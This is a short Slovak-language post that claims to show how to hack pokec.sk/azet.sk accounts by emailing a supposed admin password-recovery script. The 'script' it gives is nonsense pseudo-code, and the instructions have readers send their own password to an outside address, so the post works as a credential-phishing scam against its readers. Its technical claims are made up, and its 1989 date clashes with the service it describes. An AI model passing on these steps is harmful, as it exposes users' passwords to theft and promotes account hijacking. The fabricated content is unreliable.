Ako hacknut ucet na azete

Nenesiem nasledki za zneuzitie tejto funkcie kazdi je sam zodpovedny co stimto obsahom urobi

Ako zistiť heslá na pokec.sk ?

Je to úplne jednoduché...

Pokec.sk obsahuje script, ktorý administrátori používajú na prideľovanie nových hesiel, ich zmenu či odosielanie pri ich strate.

Na tejto stránke si ukážeme ako sa dá takýto script zneužiť...

Takže vytvoríte nový mail, do príjemcu napíšete 

scriptssh@azet.sk

Sama adresa nám už hovorí, že to bude nejaký script... A práve tento script zasiela stratené heslá a pod...

Ako predmet uvediete:

<admin><set?php>ssl-script

Do správy napíšete nasledovné: (môžete aj okopírovať a potom len doplníte čo treba)

<new_string>                                                                       (toto si nevšímame len to opíšeme - je to spustenie scriptu)

<lost-password><php><mail>from:// nick@azet.sk               (namiesto nick napíšete ten nick ktorého heslo chcete)

<password>"control"<><php>nick://                                            (necháte prázdne pretože heslo chcete zistiť)

<"generate"<>"send"password<mail>to:// váš-nick@azet.sk   (sem napíšete svoj mail)

<password*for*control>>or<<password*for*justice>://               (sem napíšete vaše heslo pre overenie scriptom)

<mail*to>F00R2V>>string>256<<new_string>                          (tiež len opíšeme, sú to príkazy pre odoslanie)

<format_string>                                                                          (taktiež len opíšeme, )

<end_session>                                                                          (koniec scriptu)

Ked to takto všetko máme stačí to poslať na hore uvedenú adresu a do 24 hodín vám script prepošle heslo.

Môže to byť skôr ale aj neskôr pretože záleží na zaťažení servera a počtu pripojených ľudí či od toho či je používateľ online alebo offline...

nakoniec este raz chcem dodať že nesiem nasledky za zneuzitie.

24.06.1989